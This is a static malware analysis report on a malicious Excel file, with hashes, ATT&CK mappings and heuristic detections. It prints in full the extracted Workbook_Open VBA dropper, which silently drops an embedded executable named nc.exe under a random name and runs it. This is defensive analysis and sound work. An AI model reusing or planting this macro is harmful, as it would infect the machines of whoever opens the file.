Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 52a6f05233ead27f…

MALICIOUS

Office (OOXML)

Size: 927.5 KB
Created: 2020-04-19 06:46:13 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-07-24
MD5: ee764ec4b56c454d3e4edfe2f8c50088
SHA-1: c71193cab9286e69d12f68d8aa23195e0c296423
SHA-256: 52a6f05233ead27f48cf030ca6bd95089d16b80a2e997798e976837311f43a3c
Risk Score: 336

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1137.003 DLL Search Order Hijacking
  • T1566.001 Spearphishing Attachment

The sample is a malicious Excel document containing a Workbook_Open VBA macro that uses WScript.Shell to execute a dropped payload. The macro constructs a target filename by concatenating the value of the LOCALAPPDATA environment variable with a randomly generated 8-character string, resulting in a path like 'C:\Users\Public\<random_string>.exe'. It then attempts to paste an embedded OLE object (identified as 'ooxml_oleobject_00.bin' and 'ooxml_oleobject_00_ole10native_00.bin') into the LOCALAPPDATA directory and rename it to the generated executable name. Finally, it executes this dropped file using Shell(). This indicates the document's purpose is to download and execute a second-stage payload.

Heuristics (10)

  • ClamAV: Doc.Dropper.Agent-7726048-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7726048-0
  • Ole10Native package drops an auto-executable payload [critical] OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use: it is a malware-delivery dropper.
  • VBA project inside OOXML [medium, 5 related findings] OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched lines in script:
        targetFileName = Environ("LOCALAPPDATA") & "/" & RandomString & ".exe"
        Set shell_obj = CreateObject("WScript.Shell")
        ActiveSheet.OLEObjects(1).Visible = False
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched lines in script:
        targetFileName = Environ("LOCALAPPDATA") & "/" & RandomString & ".exe"
        Set shell_obj = CreateObject("WScript.Shell")
        ActiveSheet.OLEObjects(1).Visible = False
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched lines in script:
        Attribute VB_Customizable = True
        Private Sub Workbook_Open()
            On Error Resume Next
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched lines in script:
        Dim targetFileName As String
        originalFileName = Environ("LOCALAPPDATA") & "/nc.exe"
        CharacterBank = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1944 bytes
SHA-256: 0e2283a77ad8b5e96adeb8db3b27c21c4476fc36912173b47663360cbf505e77
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
    Dim shell_obj
    Dim CharacterBank As Variant
    Dim x As Long
    Dim str As String
    Dim orginalFileName As String
    Dim targetFileName As String
    originalFileName = Environ("LOCALAPPDATA") & "/nc.exe"
    CharacterBank = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
         "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", _
         "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", _
         , "A", "B", "C", "D", "E", "F", "G", "H", _
         "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", _
         "W", "X", "Y", "Z")
    For x = 1 To 8
        Randomize
        str = str & CharacterBank(Int((UBound(CharacterBank) - LBound(CharacterBank) + 1) * Rnd + LBound(CharacterBank)))
    Next x
    RandomString = str
    targetFileName = Environ("LOCALAPPDATA") & "/" & RandomString & ".exe"
    Set shell_obj = CreateObject("WScript.Shell")
    ActiveSheet.OLEObjects(1).Visible = False
    ActiveSheet.OLEObjects(1).Copy
    CreateObject("Shell.Application").Namespace(Environ("LOCALAPPDATA")).Self.InvokeVerb "Paste"
    Name originalFileName As targetFileName
    shell_obj.Run Chr(34) & Environ("LOCALAPPDATA") & "/" & RandomString & ".exe" & Chr(34), 0
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Filename: ooxml_oleobject_00.bin
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: xl/embeddings/oleObject1.bin
Size: 676352 bytes
SHA-256: e4f54bc5ca53f7684403c861f9059e1da19e28dd176200fd7b666db2adc61094
Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely
    Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04

Filename: ooxml_oleobject_00_ole10native_00.bin
Kind: ole-package
Source: OOXML xl/embeddings/oleObject1.bin, Ole10Native stream
Size: 668493 bytes
SHA-256: 16db8f8c0c2faed495c429294a08a1787f7e2a19b6a41ef4b11680ee2b6c7b88
Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely
    Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 22016 bytes
SHA-256: 869bf03c339bc8d51af8aaecf22cc92e4cf5ce80f91e49f3b4f2dba896f07be5

Filename: emf_00.emf
Kind: ooxml-emf
Source: OOXML EMF part: xl/media/image1.emf
Size: 4968 bytes
SHA-256: 1516b13bc403900010b235de8cd7e8c8577d4dd6e73bfa0fdc26427943f3f948